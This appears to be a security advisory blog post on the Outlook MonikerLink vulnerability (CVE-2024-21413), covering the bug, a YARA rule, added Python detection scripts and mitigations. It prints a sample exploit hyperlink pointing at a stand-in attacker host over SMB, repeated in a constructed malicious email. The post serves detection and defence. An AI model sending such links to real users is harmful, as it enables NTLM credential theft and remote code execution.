Critical Security Alert: Microsoft Outlook Vulnerability (CVE-2024-21413)
Introduction
Every month, Microsoft follows a routine called “Patch Tuesday”: on the second Tuesday of the month, at 7:00 PM GMT, it releases security updates, and in doing so discloses vulnerabilities that might otherwise have stayed hidden.
Patches reveal long-standing threats in a peculiar way. A vulnerability may have existed for years and only come to light once a fix for it ships: reverse engineering the update (patch diffing) exposes the specific changes it makes, and from those changes the underlying bug.
Even after the patch is out, attackers can still exploit the bug. The patched vulnerability becomes what is effectively an n-day weapon (a “late zero-day”), aimed at users who have not updated yet.
In this landscape, a recent discovery has come to light: a critical vulnerability known as CVE-2024-21413, or the MonikerLink vulnerability, in Microsoft Outlook. This finding has raised concerns about the risk to Outlook users. Here is an overview, together with the available fixes and workarounds, to help keep your Outlook deployment safe.
Technical Details:
- Vulnerability Name: CVE-2024-21413 (MonikerLink)
- Severity: Critical
- Affected Software: Microsoft Outlook
- CVSS (Common Vulnerability Scoring System) Score: 9.8
- Exploit Vector: Remote Code Execution (RCE)
Understanding the MonikerLink Vulnerability:
Outlook renders HTML emails and parses many kinds of hyperlinks, among them Moniker Links. Normally, Outlook shows a security warning before a link hands control to an external application.
The vulnerability arises when the hyperlink is modified to include the ! special character followed by arbitrary text in the Moniker Link, which effectively bypasses Outlook’s Protected View. For instance:
<p><a href="file://Attacker_IP/test!exploit">Click me</a></p>
Remote Code Execution (RCE) becomes possible because Moniker Links are resolved through the Component Object Model (COM) on Windows: the path before the ! is treated as a file moniker and the text after it as an item moniker, and resolving that composite launches Word as a COM server to open the remote file.
How It Works:
Malicious Links: By exploiting the flaw in Outlook’s hyperlink handling, attackers can craft links that bypass the security prompt and execute arbitrary code on the victim’s system.
NTLM Credential Theft: Because the link points at a remote SMB share, the victim’s machine attempts to authenticate to it, so successful exploitation may leak the NTLM credential information used in Windows environments.
Combined Attacks: Threat actors can combine this vulnerability with others to achieve complete remote code execution and take control of the victim’s machine. This CVE has been chained with CVE-2023-21716 or CVE-2022-30190 to obtain RCE.
Requirements:
- The victim’s network must allow outbound SMB traffic to external hosts.
- The exploit must be tailored to how Word operates as a COM server, so that the malicious actions are actually carried out.
These specific requirements reduce the likelihood of successful exploitation of this CVE.
Detection and Identification:
YARA
YARA is a framework for large-scale pattern matching. Florian Roth published a YARA rule that detects emails containing the file:///\\ element in a Moniker Link:
rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {
   meta:
      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
      author = "X__Junior, Florian Roth"
      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
      date = "2024-02-17"
      modified = "2024-02-19"
      score = 75
   strings:
      $a1 = "Subject: "
      $a2 = "Received: "
      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
   condition:
      filesize < 1000KB
      and all of ($a*)
      and 1 of ($xr*)
}
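As an added example (not code from the original post, nor from the YARA rule’s authors), the following Python script applies the same check to a raw .eml message. It re-implements the rule’s regular expression, extracts every href from the HTML body, and splits each file:// link into its host, path and the item text after the !, which is the part that turns a plain file link into the composite moniker described above. The two sample messages are constructed, 203.0.113.10 is a documentation-range address, and the extension list is a representative subset of the rule’s.

```python
"""Scan raw .eml text for MonikerLink-style file:// hyperlinks.

Added example, not code from the original post or the YARA rule's authors.
Re-implements the rule's regex in Python and, for every file:// link that
carries a '!' item moniker, splits it into host, path and item for triage.
The messages below are constructed; 203.0.113.0/24 is a documentation range.
"""
import re
from email import message_from_string
from html.parser import HTMLParser
from typing import Dict, List

# Same shape the YARA rule looks for: file:///\\<host>\<path>.<ext>!
# (a representative subset of the rule's extension list is used here).
YARA_MONIKER_RE = re.compile(
    r'file:///\\\\[^"\']{6,600}\.'
    r'(docx|txt|pdf|xlsx|pptx|rtf|exe|lnk|hta|js|vbs|doc|docm|xls|xlsm)!',
    re.IGNORECASE,
)


class _HrefCollector(HTMLParser):
    """Collects href values from <a> tags in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "a":  # HTMLParser lower-cases tag and attribute names
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def parse_moniker_link(href: str) -> Dict[str, str]:
    """Split file://[/]\\host\path\file.ext!item into host, path and item.

    The text after '!' is the item moniker; its presence turns a plain file
    link into a composite moniker that Windows resolves through COM.
    """
    body = href[8:] if href.lower().startswith("file:///") else href[7:]
    file_part, bang, item = body.partition("!")
    segments = [s for s in file_part.replace("/", "\\").split("\\") if s]
    return {
        "host": segments[0] if segments else "",
        "path": "\\".join(segments[1:]),
        "item": item if bang else "",
    }


def scan_eml(raw: str) -> List[Dict[str, object]]:
    """Return one finding per file:// hyperlink that carries an item moniker."""
    msg = message_from_string(raw)
    # Mirror the rule's header anchors: skip anything that was never delivered.
    if msg["Subject"] is None or msg.get_all("Received") is None:
        return []
    findings: List[Dict[str, object]] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True)  # undoes base64/quoted-printable
        if payload is None:
            continue
        html = payload.decode(part.get_content_charset() or "utf-8", "replace")
        collector = _HrefCollector()
        collector.feed(html)
        for href in collector.hrefs:
            if not href.lower().startswith("file://"):
                continue
            parts = parse_moniker_link(href)
            if not parts["item"]:
                continue  # plain file link: Outlook still shows its warning
            findings.append({
                "href": href, **parts,
                # True only for the stricter UNC-plus-extension shape the
                # YARA rule requires; the bare file://host/name!item form fails it.
                "yara_match": YARA_MONIKER_RE.search(href) is not None,
            })
    return findings


# Constructed samples: one benign message, one carrying two MonikerLinks.
BENIGN_EML = r"""Received: from mail.example.test by mx.example.test; Sat, 17 Feb 2024 10:00:00 +0000
Subject: Quarterly report
Content-Type: text/html; charset="utf-8"

<p><a href="file:///\\fileserver.corp.test\share\report.docx">Report</a>
<a href="https://intranet.corp.test/">Portal</a></p>
"""

MALICIOUS_EML = r"""Received: from mail.example.test by mx.example.test; Sat, 17 Feb 2024 10:00:00 +0000
Subject: Invoice
Content-Type: text/html; charset="utf-8"

<p><a href="file:///\\203.0.113.10\share\test.rtf!something">Click me</a>
<a href="file://Attacker_IP/test!exploit">Click me</a></p>
"""

if __name__ == "__main__":
    for hit in scan_eml(MALICIOUS_EML):
        print(hit["host"], hit["path"], hit["item"], hit["yara_match"])
```

Two points worth noticing when running it: the rule’s regex only fires on the UNC form (file:///\\host\…) with a recognised extension, so the looser file://host/name!item shape from the snippet above is reported with yara_match set to False; the script’s own check (any file:// link with an item moniker) catches it, at the cost of more false positives. Decoding the MIME body before matching also handles quoted-printable or base64-encoded HTML, which a raw byte match over the .eml file would miss.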
Wireshark
Cybersecurity analysts can use packet captures to understand communication patterns and spot exploitation attempts. In the case of CVE-2024-21413, examining a capture in Wireshark can reveal outbound SMB requests from the victim to the remote server, accompanied by truncated NetNTLMv2 hashes. This visibility improves detection, letting security teams understand the dynamics of the attack and take appropriate countermeasures.
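The same signal can be hunted in flow logs rather than packet captures. The following Python script is an added example (not from the original post): it reads a constructed, Zeek-style conn log and flags internal hosts that open SMB (TCP 445 or 139) to addresses outside the configured internal ranges, which is exactly the outbound SMB traffic the Requirements section says the exploit depends on. The column layout is a reduced, constructed one (a real Zeek conn.log has more columns), and the addresses in 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges used as placeholders.

```python
"""Flag outbound SMB connections to external hosts in a Zeek-style conn log.

Added example, not from the original post. A MonikerLink click makes the
victim reach out over SMB to the remote UNC path, which is the flow this
script looks for. The log lines and column layout are constructed (a real
Zeek conn.log has more columns); 203.0.113.0/24 and 198.51.100.0/24 are
IANA documentation ranges.
"""
import ipaddress
from typing import Dict, List

SMB_PORTS = {445, 139}  # direct-hosted SMB and NetBIOS session service

# Ranges treated as internal; adjust for your own network. The stdlib's
# is_private/is_global flags also classify the documentation ranges as
# non-global, so an explicit list is used here instead.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed log: ts, src_ip, src_port, dst_ip, dst_port, proto (tab-separated)
SAMPLE_CONN_LOG = """\
#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto
1708164000.1\t10.0.5.23\t51234\t10.0.1.5\t445\ttcp
1708164001.4\t10.0.5.23\t51240\t203.0.113.10\t445\ttcp
1708164002.0\t10.0.5.44\t51302\t198.51.100.20\t443\ttcp
1708164003.7\t10.0.5.44\t51310\t203.0.113.10\t139\ttcp
1708164004.2\t10.0.9.8\t51400\t192.168.40.2\t445\ttcp
"""


def is_external(ip: str) -> bool:
    """True when the address is outside every configured internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_conn_line(line: str) -> Dict[str, object]:
    """Parse one tab-separated record of the constructed log format."""
    ts, src, sport, dst, dport, proto = line.split("\t")
    return {"ts": float(ts), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "proto": proto}


def find_outbound_smb(log_text: str) -> List[Dict[str, object]]:
    """Return records where an internal host opens SMB to an external one."""
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip Zeek-style header and comment lines
        rec = parse_conn_line(line)
        if (rec["proto"] == "tcp" and rec["dport"] in SMB_PORTS
                and not is_external(str(rec["src"]))
                and is_external(str(rec["dst"]))):
            alerts.append(rec)
    return alerts


def victims_by_server(alerts: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group alerting source hosts by the external SMB server they contacted."""
    grouped: Dict[str, set] = {}
    for rec in alerts:
        grouped.setdefault(str(rec["dst"]), set()).add(str(rec["src"]))
    return {dst: sorted(srcs) for dst, srcs in grouped.items()}


if __name__ == "__main__":
    hits = find_outbound_smb(SAMPLE_CONN_LOG)
    for server, hosts in victims_by_server(hits).items():
        print(f"external SMB server {server} contacted by {', '.join(hosts)}")
```

Grouping by destination matters during response: several internal hosts reaching the same external SMB server within minutes of a phishing wave is a stronger indicator than any single connection, and the grouped source list is the list of machines whose NetNTLMv2 material should be treated as exposed.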
FortiGuard
If you use FortiGuard with an up-to-date signature database, enable deep inspection so that the IPS engine can capture and thoroughly inspect the element.
Mitigations and Workarounds:
- Patch Installation: Microsoft has released security updates that address this vulnerability. Ensure your Outlook installation is up to date.
- Disable Hyperlinks: As a precaution, temporarily disable hyperlinks in Outlook emails until the patch is applied.
- Best Practices for Users:
· Avoid Clicking Random Links: Do not click unexpected links, especially those in unsolicited emails.
· Preview Links Before Clicking: Take a moment to check where a link points before clicking it.
· Forward Suspicious Emails: Forward any suspicious emails to the department responsible for cybersecurity.
- Protected View Bypass: Since this vulnerability bypasses Outlook’s Protected View, there is no way to reconfigure Outlook to prevent this attack.
- Firewall Considerations:
· SMB Protocol: Blocking the SMB protocol entirely may do more harm than good, since it is essential for accessing network shares.
· Firewall Level Blocking: Consider blocking outbound SMB at the firewall level; whether this is practical depends on the organization’s setup.
Conclusion:
CVE-2024-21413 is a significant risk for Outlook users. Applying security updates promptly and following best practices can help mitigate this threat. Cybersecurity is a collective effort: stay vigilant, stay informed, and protect your systems against cyberattacks.
For more information, refer to the official Microsoft Security Update Guide or the security resources listed below. Stay secure! 🔒
ANSSI / CERT-FR: ANSSI / CERT-FR Alert
Cybermalveillance.gouv.fr: Critical Security Flaw in Microsoft Outlook
CVE.org: CVE-2024-21413 Record
Check Point Research: The Risks of the MonikerLink Bug in Microsoft Outlook
TryHackMe: MonikerLink Room